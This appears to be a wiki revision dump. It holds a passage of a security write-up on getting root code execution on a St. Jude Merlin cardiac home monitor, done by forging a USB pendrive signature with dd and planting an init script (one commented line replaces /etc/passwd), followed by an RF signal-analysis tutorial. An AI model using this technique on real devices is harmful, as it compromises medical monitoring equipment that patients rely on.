00000000 00 00 00 |...|<br />
00000003<br />
rjmendez@Rjmendez:~/stjude_merlin$ hd .sign_mod<br />
00000000 53 4a 4d |SJM|<br />
00000003<br />
rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00700994 s, 0.4 kB/s<br />
rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00123249 s, 2.4 kB/s<br />
rjmendez@Rjmendez:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 53 4a 4d |SJM|<br />
00000003</pre><br />
<br />
Adding the required files to the drive and a small script.<br />
<br />
<pre>rjmendez@Rjmendez:/media/rjmendez/7A3B-B3C6$ ls -lahR<br />
.:<br />
total 36K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .<br />
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc<br />
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd<br />
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini<br />
<br />
./etc:<br />
total 24K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d<br />
<br />
./etc/init.d:<br />
total 24K<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..<br />
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh<br />
<br />
rjmendez@Rjmendez:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh <br />
#!/bin/sh<br />
function led_off {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b0<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_dim {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b1<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_bright {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b2<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function party_mode {<br />
counter=0<br />
while [ $counter -lt $1 ];<br />
do<br />
led_off<br />
sleep 0.05<br />
led_dim<br />
sleep 0.05<br />
led_bright<br />
sleep 0.05<br />
let counter=counter+1<br />
done<br />
}<br />
<br />
/etc/init.d/tantoapp stop<br />
#cp /mnt/sjmpendrives/1/passwd /etc/passwd<br />
echo "This worked!" > /root/diditwork.txt<br />
if [ -f /root/diditwork.txt ];<br />
then<br />
party_mode 15<br />
else<br />
echo "It did not work..."<br />
fi</pre><br />
<br />
This is the output that we get from the console.<br />
<br />
<pre>operator@(none):~$ su root<br />
Password: <br />
PAM_unix[265]: (su) session opened for user root by (uid=12)<br />
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2<br />
scsi0 : SCSI emulation for USB Mass Storage devices<br />
Vendor: Lexar Model: USB Flash Drive Rev: 1100<br />
Type: Direct-Access ANSI SCSI revision: 02<br />
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0<br />
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)<br />
sda: Write Protect is off<br />
Partition check:<br />
/dev/scsi/host0/bus0/target0/lun0: p1<br />
modprobe: Can't locate module /dev/sg1<br />
modprobe: Can't locate module /dev/sg2<br />
modprobe: Can't locate module /dev/sg3<br />
modprobe: Can't locate module /dev/sg4<br />
modprobe: Can't locate module /dev/sg5<br />
modprobe: Can't locate module /dev/sdb<br />
modprobe: Can't locate module /dev/sdc<br />
modprobe: Can't locate module /dev/sdd<br />
modprobe: Can't locate module /dev/sde<br />
modprobe: Can't locate module /dev/sdf<br />
modprobe: modprobe: Can't locate module nls_cp437<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
ls /root<br />
devel_install.sh diditwork.txt setdev.sh setlog.sh<br />
root@(none):~# cat /root/diditwork.txt <br />
This worked!<br />
root@(none):~# cat /tmp/usbstorage.log <br />
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002<br />
REM = /var/run/usb/%proc%bus%usb%001%002<br />
Find and mount all attached usb storage devices<br />
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)<br />
Use sgmap to match 0:0:0:0.<br />
Waiting for device id to appear...<br />
SCSI disk for 0:0:0:0 is /dev/sda<br />
Checking /mnt/sjmpendrives/1<br />
Mountpoint /mnt/sjmpendrives/1 is free<br />
Checking signature ... <br />
node1 = /dev/sda1<br />
Valid pendrive<br />
Valid pendrive<br />
Mounting /dev/sda1 on /mnt/sjmpendrives/1<br />
/dev/sda1 is now mounted on /mnt/sjmpendrives/1<br />
Launch application specific script</pre><br />
<br />
== Party Mode Demo ==<br />
{{#ev:youtube|cNcGebu8NRs}}<br />
<br />
== Other Stuff to Look Into ==<br />
<br />
I doubt this device has been updated to the latest firmware as I aquired it still wrapped in its packaging. As of January 2017 St. Jude Medical claims that a security patch has been applied to the newer firmware releases.<br />
<br />
Below are some interesting things that were found.<br />
<br />
DSA keys and known hosts.<br />
<pre>root@(none):~# cd /root/.ssh<br />
root@(none):~/.ssh# ls -lah<br />
drwx------ 2 root root 0 Jan 10 2013 .<br />
drwxrwxr-x 3 root root 0 May 15 00:10 ..<br />
-rw------- 1 root root 668 Nov 28 2012 id_dsa<br />
-rw-r--r-- 1 root root 601 Nov 28 2012 id_dsa.pub<br />
-rw-r--r-- 1 root root 719 Nov 28 2012 known_hosts<br />
root@(none):~/.ssh# cat known_hosts <br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtfdoYdn5D/vsC4Pm25jBUXDzfXrj6O50O32UONPOnvKcb08acULYcx1bDyeRGcMBqKwEJdPUKdwAT2evf4jYVSa4JvDAHQWJo15s2igWO04veEYitV5i0NEqVs+vRTJAqM70iCIKkhtoGkjBBnJcntw6u/8vgKXkvqBx85WBULc=<br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29HEmKtQ5RABmAWmZ3MdyO+wiQ1GGzuNneGnPPL8KF+SYLjHXaQViB32cibA9dSauMpb8zcwj7YSxtKfu4K1gcH5vUOsqW9BgDsZYv7zWk2OHb8vLs+NT083+YbzjZvr7oGz+1/TAzfXORsN9Gf+BQMsHyjiHOjVJ/vEIy2fp0E=<br />
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyDjGfUubwy0y0KJw459g2L17DK4K4QAIZSvcW8hupVNK/3IrP9HSXetS69czyLISFfewq6a4ippvsbh5i+fb2C2vhHmW4N1U3zKa6vcKzUEd6j6NwUefunbSP8XBXaMoqSuN2l3nbfEeUIaVDuSk9m6uP/rVcGVQHZokPVDdpP8=</pre><br />
<br />
Dev scripts in /root/<br />
<pre>root@(none):~# ls -lah /root<br />
drwxrwxr-x 3 root root 0 May 15 00:10 .<br />
drwxr-xr-x 20 root root 0 Jan 1 1970 ..<br />
-rw-r--r-- 1 root root 446 Jan 1 1970 .bash_history<br />
-rw-r--r-- 1 root root 52 Apr 24 2008 .bash_profile<br />
drwx------ 2 root root 0 Jan 10 2013 .ssh<br />
-r-xr-xr-x 1 root root 3.0k Nov 28 2012 devel_install.sh<br />
-r-xr-xr-x 1 root root 483 Nov 28 2012 setdev.sh<br />
-r-xr-xr-x 1 root root 267 Nov 28 2012 setlog.sh<br />
<br />
root@(none):~# cat setdev.sh <br />
#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./setdev.sh [1|0]"<br />
exit<br />
fi<br />
<br />
if [ $1 -eq 1 ]; then<br />
sed '1,$s/DEVELOPMENT \(.*= .*\)0/DEVELOPMENT \11/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf<br />
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf<br />
elif [ $1 -eq 0 ]; then<br />
sed '1,$s/DEVELOPMENT \(.*= .*\)1/DEVELOPMENT \10/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf<br />
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf<br />
else<br />
echo "Invalid argument"<br />
fi<br />
<br />
root@(none):~# cat setlog.sh <br />
#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./setlog.sh [1|0]"<br />
exit<br />
fi<br />
<br />
if [ $1 -eq 1 ]; then<br />
touch /data/config/.tantolog<br />
touch /data/config/.dcllog<br />
elif [ $1 -eq 0 ]; then<br />
rm /data/config/.tantolog<br />
rm /data/config/.dcllog<br />
else<br />
echo "Invalid argument"<br />
fi<br />
<br />
root@(none):~# cat devel_install.sh<br />
#!/bin/sh<br />
#<br />
# Script to download the devel package via scp from ftp.pacesetter.com<br />
# Username: REDACTED_USER. The script will prompt for a password which the <br />
# user has to enter. <br />
# <br />
# Version 0.1 - Ashok Iyer (aiyer at sjm dot com)<br />
<br />
# Setup the PATH. Don't assume we get a sane one<br />
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin<br />
<br />
# IP address of the server from which we download the devel package using scp.<br />
SERVER="10.16.155.27"<br />
<br />
function download_package()<br />
{<br />
# Download the devel package and the md5sum.txt file<br />
echo -e "\n==> Downloading $1 package using wget.\n"<br />
<br />
wget ftp://REDACTED_USER:REDACTED_PASSWORD@10.16.155.27/$2/$1<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "scp failed..."<br />
exit 1<br />
fi<br />
}<br />
<br />
/root/setdev.sh 1<br />
/etc/init.d/tantoapp stop<br />
<br />
if [ ! -f /etc/password_key ]; then<br />
touch /etc/password_key<br />
fi<br />
<br />
echo "-----------------------------------------------------"<br />
echo "This script will install the development package" <br />
echo "This contains the following:"<br />
<br />
echo " 1. gdbserver"<br />
echo " 2. ssh server"<br />
echo " 3. procps (contains vmstat and top)"<br />
echo " 4. dos2unix and unix2dos"<br />
echo " 5. ftp client"<br />
echo " 6. mtd utilities (for diagnostics)"<br />
echo " 7. less utility"<br />
echo " 8. traceroute"<br />
echo " 9. agentd"<br />
echo " 10. monitord"<br />
echo "-----------------------------------------------------"<br />
<br />
sleep 2<br />
<br />
# Test if the server is reachable<br />
echo <br />
echo "---- Testing server connectivity ----"<br />
sleep 2<br />
ping -c 3 -w 10 $SERVER<br />
<br />
if [ "$?" != 0 ]; then<br />
echo <br />
echo "--- $SERVER not reachable. ---"<br />
echo " Will try connecting anyway (some firewalls block ping requests)".<br />
echo " Contact your network administrator if the connection fails"<br />
sleep 2<br />
else<br />
echo <br />
echo "--- Server reachable. Good! ---"<br />
echo<br />
fi<br />
<br />
TMPDIR="$HOME/devel$$"<br />
mkdir $TMPDIR<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "unable to create temporary directory. Check if you have write"<br />
echo "permissions in $HOME"<br />
fi<br />
<br />
cd $TMPDIR<br />
# Download the development packages<br />
echo<br />
echo "+----------------------------------------------+"<br />
echo "| Downloading development packages using wget. |"<br />
echo "+----------------------------------------------+"<br />
echo<br />
<br />
download_package "devel-util_1.4_all.ipk" "not-so-advanced/utils/devel_packages/"<br />
<br />
echo<br />
echo "+---------------------------------------+"<br />
echo "| Installing the development utilities. |"<br />
echo "+---------------------------------------+"<br />
echo<br />
# The package is sane. Install it<br />
ipkg-cl -d root install *.ipk<br />
<br />
if [ "$?" != 0 ]; then<br />
echo "Package installation failed"<br />
exit 1<br />
fi<br />
<br />
echo<br />
echo "+-------------------------------------------+"<br />
echo "| Performing required config modifications. |"<br />
echo "+-------------------------------------------+"<br />
echo<br />
<br />
sed '1,$s/AUTOKEYGEN=no/AUTOKEYGEN=yes/g' /etc/default/ssh > /tmp/ssh<br />
cp -a /tmp/ssh /etc/default/ssh<br />
<br />
echo<br />
echo "+-------------------------------------------+"<br />
echo "| Starting SSH Daemon . |"<br />
echo "+-------------------------------------------+"<br />
echo<br />
<br />
/etc/init.d/ssh start<br />
<br />
echo<br />
echo "Devel package successfully installed"<br />
<br />
cd $HOME<br />
<br />
# delete TMPDIR<br />
rm -rf $TMPDIR<br />
<br />
exit 0</pre><br />
<br />
Sample patient profile<br />
<pre><?xml version="1.0" encoding="UTF-8"?><br />
<profile:ProfileList xmlns:profile="http://www.merlin.net/PayloadProfile.xsd"><br />
<SystemData><br />
<SystemInformation DeviceModel="XXXX-XX" DeviceSerialNumber="XXXXXX" NumberOfProfiles="7" PatientNotifyWindowEnd="23:00:00" PatientNotifyWindowStart="16:00:00" ProfileDate="2011-09-07" ProfileVersion="7" SchemaVersion="A" TransmitterModelNumber="EX1150" TransmitterProfileID="100899" TransmitterRequestType="PProfile" TransmitterSerialNumber="00000000" UTCServerTime="22:57:29"/><br />
<Controls><br />
<Switch name="ADETECT_DIALUP_NUM" value="Enable"/><br />
<Switch name="UNPAIRED_MODE" value="Disable"/><br />
<Switch name="ENROLLMENT_CHANGE" value="Disable"/><br />
<Switch name="PROFILE_SYNC_PREF" value="Enable"/><br />
<iSwitch name="ALLWD_UNSCHED_EVENTS" value="100"/><br />
<iSwitch name="NOTIFY_DELAY_ALERT" value="24"/><br />
<iSwitch name="NOTIFY_DELAY_FLP" value="96"/><br />
<iSwitch name="NOTIFY_DELAY_MED" value="0"/><br />
<iSwitch name="NOTIFY_DELAY_SERVER" value="0"/><br />
<tSwitch name="CLINIC_TYPE" value="UNKNOWN"/><br />
<tSwitch name="SHORT_BTN_ACTION" value="FLP"/><br />
<tSwitch name="LONG_BTN_ACTION" value="DCHK"/><br />
<tSwitch name="MERLIN_ID" value="512556937"/><br />
<tSwitch name="UPDATED_DEVICE_MODEL" value="1111-11"/><br />
<tSwitch name="UPDATED_DEVICE_SERIAL" value="999999"/><br />
<tSwitch name="SCHED_REF_TIME" value="2001-01-01_00-00-00"/><br />
<tSwitch name="VOL_CTRL_PREF" value="OFF"/><br />
</Controls><br />
</SystemData><br />
<PayloadProfile Type="Follow-up"><br />
<GenerateSchedule GS_DateOfEvent="2011-09-08" GS_TimeOfEvent="09:00:00"/><br />
<Controls><br />
<Switch name="GDC2_SCHED_FLP_PREF" value="Enable"/><br />
<Switch name="UNSCHED_FLP_PREF" value="Enable"/><br />
<Switch name="SCHED_FLP_PREF" value="Disable"/><br />
<Switch name="CLEAR_EPIS_FLAG" value="Enable"/><br />
<Switch name="CLEAR_ST_FLAG" value="Disable"/><br />
<Switch name="CLEAR_DIAG_FLAG" value="Enable"/><br />
<Switch name="CLEAR_SEGM_FLAG" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Device_Check"><br />
<GenerateSchedule GS_Interval="24" GS_TimeOfEvent="09:00:00"/><br />
<Controls><br />
<Switch name="UNSCH_DCHK_PREF" value="Enable"/><br />
<Switch name="SCHED_DCHK_PREF" value="Disable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Alert_Controls"><br />
<Controls><br />
<Switch name="HIGH_VRATE_EPISODE_ALERT" value="Disable"/><br />
<Switch name="V_AUTOCAP_ALERT" value="Disable"/><br />
<Switch name="ACAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="RVCAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="LVCAP_CONFIRM_ALERT" value="Disable"/><br />
<Switch name="HIGH_VRATE_EPISODE_NOT" value="Disable"/><br />
<Switch name="V_AUTOCAP_NOT" value="Disable"/><br />
<Switch name="ACAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="RVCAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="LVCAP_CONFIRM_NOT" value="Disable"/><br />
<Switch name="CONG_MON_ALERT" value="Enable"/><br />
<Switch name="DEV_IN_MRI_MODE_ALERT" value="Disable"/><br />
<Switch name="DEV_RST_MRI_MODE_ALERT" value="Disable"/><br />
<Switch name="EARLY_DEPLETION_DETECTED_ALERT" value="Enable"/><br />
<Switch name="PER_BIV_PACING_ALERT" value="Disable"/><br />
<Switch name="PER_RV_PACING_ALERT" value="Enable"/><br />
<Switch name="CONG_MON_NOT" value="Disable"/><br />
<Switch name="DEV_IN_MRI_MODE_NOT" value="Disable"/><br />
<Switch name="DEV_RST_MRI_MODE_NOT" value="Disable"/><br />
<Switch name="EARLY_DEPLETION_DETECTED_NOT" value="Disable"/><br />
<Switch name="PER_BIV_PACING_NOT" value="Disable"/><br />
<Switch name="PER_RV_PACING_NOT" value="Disable"/><br />
<Switch name="LFDA_TIMEOUT_ALERT" value="Enable"/><br />
<Switch name="ST_TYPE_2_ALERT" value="Enable"/><br />
<Switch name="VT_VF_3_PER_DAY_ALERT" value="Enable"/><br />
<Switch name="THERAPY_EXHAUSTED_ALERT" value="Enable"/><br />
<Switch name="HV_THERAPY_UNSUC_ALERT" value="Enable"/><br />
<Switch name="VT_VF_OCCURED_ALERT" value="Enable"/><br />
<Switch name="LFDA_TIMEOUT_NOT" value="Disable"/><br />
<Switch name="ST_TYPE_2_NOT" value="Disable"/><br />
<Switch name="VT_VF_3_PER_DAY_NOT" value="Disable"/><br />
<Switch name="THERAPY_EXHAUSTED_NOT" value="Disable"/><br />
<Switch name="HV_THERAPY_UNSUC_NOT" value="Disable"/><br />
<Switch name="VT_VF_OCCURED_NOT" value="Disable"/><br />
<Switch name="LFDA_NSLN_ALERT" value="Enable"/><br />
<Switch name="LFDA_RV_NOISE_ALERT" value="Enable"/><br />
<Switch name="ST_TYPE_1_ALERT" value="Enable"/><br />
<Switch name="LFDA_NSLN_NOT" value="Disable"/><br />
<Switch name="LFDA_RV_NOISE_NOT" value="Disable"/><br />
<Switch name="ST_TYPE_1_NOT" value="Enable"/><br />
<Switch name="AIMP_OOR_ALERT" value="Disable"/><br />
<Switch name="CCRG_LMT_ALERT" value="Enable"/><br />
<Switch name="DEV_EOS_ALERT" value="Disable"/><br />
<Switch name="DEV_ERI_ALERT" value="Enable"/><br />
<Switch name="DEV_EVVI_ALERT" value="Enable"/><br />
<Switch name="DEV_RST_ALERT" value="Enable"/><br />
<Switch name="HVIMP_OOR_ALERT" value="Enable"/><br />
<Switch name="HW_BVVI_ALERT" value="Enable"/><br />
<Switch name="LVIMP_OOR_ALERT" value="Disable"/><br />
<Switch name="OCD_ALERT" value="Enable"/><br />
<Switch name="SOSD_ALERT" value="Enable"/><br />
<Switch name="RVIMP_OOR_ALERT" value="Enable"/><br />
<Switch name="TTRPY_DIS_ALERT" value="Enable"/><br />
<Switch name="ATAF_DUR_ALERT" value="Disable"/><br />
<Switch name="ATAF_WK_DUR_ALERT" value="Disable"/><br />
<Switch name="ATAF_VRATE_ALERT" value="Disable"/><br />
<Switch name="ATP_RX_SUCCESS_ALERT" value="Enable"/><br />
<Switch name="HV_TRPY_ALERT" value="Enable"/><br />
<Switch name="PERCENT_BIV_THRESHOLD_ALERT" value="Disable"/><br />
<Switch name="PERCENT_RV_THRESHOLD_ALERT" value="Disable"/><br />
<Switch name="ST_MAJOR_EPISODE_ALERT" value="Disable"/><br />
<Switch name="TRPY_ACCEL_ALERT" value="Enable"/><br />
<Switch name="NOISE_REV_ALERT" value="Disable"/><br />
<Switch name="NSVT_EPIS_ALERT" value="Disable"/><br />
<Switch name="NSVF_EPIS_ALERT" value="Disable"/><br />
<Switch name="SPARE_1_ALERT" value="Disable"/><br />
<Switch name="SPARE_2_ALERT" value="Disable"/><br />
<Switch name="SPARE_3_ALERT" value="Disable"/><br />
<Switch name="SPARE_4_ALERT" value="Disable"/><br />
<Switch name="SPARE_5_ALERT" value="Disable"/><br />
<Switch name="AIMP_OOR_NOT" value="Disable"/><br />
<Switch name="CCRG_LMT_NOT" value="Disable"/><br />
<Switch name="DEV_EOS_NOT" value="Disable"/><br />
<Switch name="DEV_ERI_NOT" value="Disable"/><br />
<Switch name="DEV_EVVI_NOT" value="Disable"/><br />
<Switch name="DEV_RST_NOT" value="Disable"/><br />
<Switch name="HVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="HW_BVVI_NOT" value="Disable"/><br />
<Switch name="LVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="OCD_NOT" value="Disable"/><br />
<Switch name="SOSD_NOT" value="Disable"/><br />
<Switch name="RVIMP_OOR_NOT" value="Disable"/><br />
<Switch name="TTRPY_DIS_NOT" value="Disable"/><br />
<Switch name="ATAF_DUR_NOT" value="Disable"/><br />
<Switch name="ATAF_WK_DUR_NOT" value="Disable"/><br />
<Switch name="ATAF_VRATE_NOT" value="Disable"/><br />
<Switch name="ATP_RX_SUCCESS_NOT" value="Disable"/><br />
<Switch name="HV_TRPY_NOT" value="Disable"/><br />
<Switch name="PERCENT_BIV_THRESHOLD_NOT" value="Disable"/><br />
<Switch name="PERCENT_RV_THRESHOLD_NOT" value="Disable"/><br />
<Switch name="ST_MAJOR_EPISODE_NOT" value="Disable"/><br />
<Switch name="TRPY_ACCEL_NOT" value="Disable"/><br />
<Switch name="NOISE_REV_NOT" value="Disable"/><br />
<Switch name="NSVT_EPIS_NOT" value="Disable"/><br />
<Switch name="NSVF_EPIS_NOT" value="Disable"/><br />
<Switch name="SPARE_1_NOT" value="Disable"/><br />
<Switch name="SPARE_2_NOT" value="Disable"/><br />
<Switch name="SPARE_3_NOT" value="Disable"/><br />
<Switch name="SPARE_4_NOT" value="Disable"/><br />
<Switch name="SPARE_5_NOT" value="Disable"/><br />
<iSwitch name="BIV_PACING_DURATION" value="7"/><br />
<iSwitch name="RV_PACING_DURATION" value="7"/><br />
<iSwitch name="ALERT_MASK_DURATION" value="4000"/><br />
<iSwitch name="PERCENT_BIV_PACING" value="100"/><br />
<iSwitch name="PERCENT_RV_PACING" value="100"/><br />
<br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="GDC"><br />
<GenerateSchedule GS_Interval="1440"/><br />
<UploadSchedule US_Interval="168"/><br />
<Controls><br />
<Switch name="SCHED_GDC_PREF" value="Disable"/><br />
<Switch name="CLEAR_GDC_FLAG" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Maintenance"><br />
<UploadSchedule US_Interval="168"/><br />
<Controls><br />
<Switch name="MAINT_REBOOT_PREF" value="Disable"/><br />
<Switch name="MAINT_PREF" value="Enable"/><br />
<Switch name="RF_STAT_COLLECT" value="Disable"/><br />
<Switch name="STAT_DATA_UPLD_PREF" value="Enable"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="MED"><br />
<GenerateSchedule GS_Interval="24"/><br />
<UploadSchedule US_Interval="7"/><br />
<Controls><br />
<Switch name="SCHED_MED_PREF" value="Enable"/><br />
<Switch name="SCHED_MED_WINDOW_PREF" value="Enable"/><br />
<iSwitch name="ACTIVE_MED_SCHEDULES" value="1"/><br />
<tSwitch name="MED_SCHEDULE_1" value="1100"/><br />
<tSwitch name="MED_SCHEDULE_2" value="0500"/><br />
</Controls><br />
</PayloadProfile><br />
<PayloadProfile Type="Spare"><br />
<GenerateSchedule GS_DateOfEvent="2000-01-01" GS_Interval="0" GS_TimeOfEvent="08:00:00" GS_UnscheduledEvent="Disable" GS_WeeklyEvent="Sunday"/><br />
<UploadSchedule US_DateOfEvent="2000-01-01" US_Interval="0" US_TimeOfEvent="08:00:00" US_UnscheduledEvent="Disable" US_WeeklyEvent="Sunday"/><br />
<Controls><br />
<Switch name="SPARE_FLAG1" value="Disable"/><br />
<Switch name="SPARE_FLAG2" value="Enable"/><br />
<Switch name="SPARE_FLAG3" value="Disable"/><br />
<Switch name="SPARE_FLAG4" value="Disable"/><br />
<Switch name="SPARE_FLAG5" value="Disable"/><br />
<Switch name="SPARE_FLAG6" value="Disable"/><br />
<Switch name="SPARE_FLAG7" value="Disable"/><br />
<Switch name="SPARE_FLAG8" value="Disable"/><br />
<Switch name="SPARE_FLAG9" value="Disable"/><br />
<Switch name="SPARE_FLAG10" value="Disable"/><br />
<iSwitch name="SPARE_INTEGER1" value="0"/><br />
<iSwitch name="SPARE_INTEGER2" value="0"/><br />
<iSwitch name="SPARE_INTEGER3" value="0"/><br />
<iSwitch name="SPARE_INTEGER4" value="0"/><br />
<iSwitch name="SPARE_INTEGER5" value="0"/><br />
<iSwitch name="SPARE_INTEGER6" value="0"/><br />
<iSwitch name="SPARE_INTEGER7" value="0"/><br />
<iSwitch name="SPARE_INTEGER8" value="0"/><br />
<iSwitch name="SPARE_INTEGER9" value="0"/><br />
<iSwitch name="SPARE_INTEGER10" value="0"/><br />
<rSwitch name="SPARE_REAL4" value="0.0"/><br />
<rSwitch name="SPARE_REAL5" value="0.0"/><br />
<rSwitch name="SPARE_REAL6" value="0.0"/><br />
<rSwitch name="SPARE_REAL7" value="0.0"/><br />
<rSwitch name="SPARE_REAL8" value="0.0"/><br />
<rSwitch name="SPARE_REAL9" value="0.0"/><br />
<rSwitch name="SPARE_REAL10" value="0.0"/><br />
<rSwitch name="SPARE_REAL1" value="0.0"/><br />
<rSwitch name="SPARE_REAL2" value="0.0"/><br />
<rSwitch name="SPARE_REAL3" value="0.0"/><br />
<tSwitch name="SPARE_TEXT1" value=" "/><br />
<tSwitch name="SPARE_TEXT2" value=" "/><br />
<tSwitch name="SPARE_TEXT3" value=" "/><br />
<tSwitch name="SPARE_TEXT4" value=" "/><br />
<tSwitch name="SPARE_TEXT5" value=" "/><br />
<tSwitch name="SPARE_TEXT6" value=" "/><br />
<tSwitch name="SPARE_TEXT7" value=" "/><br />
<tSwitch name="SPARE_TEXT8" value=" "/><br />
<tSwitch name="SPARE_TEXT9" value=" "/><br />
<tSwitch name="SPARE_TEXT10" value=" "/><br />
</Controls><br />
</PayloadProfile><br />
</profile:ProfileList></pre></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=Blind_RF_Signal_Analysis&diff=2821Blind RF Signal Analysis2017-08-07T00:50:39Z<p>Rjmendez: Rjmendez moved page Blind RF Signal Analysis to RF Signal Analysis</p>
<hr />
<div>#REDIRECT [[RF Signal Analysis]]</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=RF_Signal_Analysis&diff=2820RF Signal Analysis2017-08-07T00:50:39Z<p>Rjmendez: Rjmendez moved page Blind RF Signal Analysis to RF Signal Analysis</p>
<hr />
<div>This page will be to cover some basic RF signal analysis.<br />
<br />
== About ==<br />
Many IoT devices use < 1Ghz signaling for various functions (various sensors, remote controls, device to device communication) with an undocumented and sometimes proprietary protocol. It can often be difficult to understand these without documentation and the aim here is to provide some of the first steps needed to identify and decode some of the data. The hardware used in this demo will be:<br />
<br />
A HackRF from Great Scott Gadgets. (https://greatscottgadgets.com/hackrf/)<br />
<br />
An RTL-SDR dongle from the rtl-sdr blog that is for sale on amazon. (http://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/)<br />
<br />
Another device from Great Scott Gadgets, the YARD Stick One. (https://greatscottgadgets.com/yardstickone/)<br />
<br />
== Where to look ==<br />
<br />
One great place to start is with the FCC documentation for the transmitting device, if the device has an fccid then it will have information on file. Some good reference links are below.<br />
<br />
Awesome US spectrum allocation graphic: https://upload.wikimedia.org/wikipedia/commons/d/df/United_States_Frequency_Allocations_Chart_2011_-_The_Radio_Spectrum.pdf<br />
<br />
Wikipedia page on ISM bands: https://en.wikipedia.org/wiki/ISM_band<br />
<br />
Our demo device right now will be an alarm remote control with the fccid "B4Z-RF400401" that does not have the frequency listed on the package.<br />
<br />
[[File:Remote.jpg|300px]]<br />
<br />
We can throw this ID into the https://fccid.io/ site to get some details.<br />
<br />
https://fccid.io/B4Z-RF4004-01-2<br />
<br />
[[File:B4Z-RF400401_fccid.io.PNG|300px]]<br />
<br />
Now we know where this device is supposed to be transmitting and we can move on to the next steps.<br />
<br />
== How to look ==<br />
<br />
Some favorites are gqrx (linux and mac http://gqrx.dk/) or sdr# (windows http://airspy.com/download/ ) in a higher sample rate mode to inspect the entire band the device operates on to look for the signal. For the rest of the demo I will be using another device with no FCC id. It advertises that it operates at 433mhz. I will be capturing with the RTL-SDR dongle.<br />
<br />
[[File:Shock_Collar.jpg|300px]]<br />
<br />
{{#ev:youtube|NI8U1IfQyto}}<br />
<br />
I know where to look for the signal now but the wave form isn't showing me very much. Listening to the demodulated audio does tell me something however, this sounds like Amplitude Shift Keying (ASK) also known as On Off Keying (OOK). Lets verify this with gnuradio and gr-fosphor over the hackrf for a bit higher quality signal.<br />
<br />
[[File:Inspect_ook_grc.png|500px]]<br />
[[File:Inspect_ook_gr-fosphor.png|500px]]<br />
<br />
This absolutely looks like OOK.<br />
<br />
Useful link to the Signal Identification Guide wiki: http://www.sigidwiki.com/wiki/Signal_Identification_Guide<br />
<br />
== Decoding ==<br />
<br />
Our next task will be to determine the data rate, a favorite tool is Inspectrum (https://github.com/miek/inspectrum).<br />
<br />
[[File:Inspectrum_ook.png|500px]]<br />
<br />
We can see the definite bits here and get a general idea about the baud rate, it looks like it is above 3500 baud but we can refine this! Another useful tool is Universal Radio Hacker (https://github.com/sthysel/urh) that can take a bunch of the work out of demodulating and decoding a signal.<br />
<br />
[[File:URH_waveform_demod.png|500px]]<br />
<br />
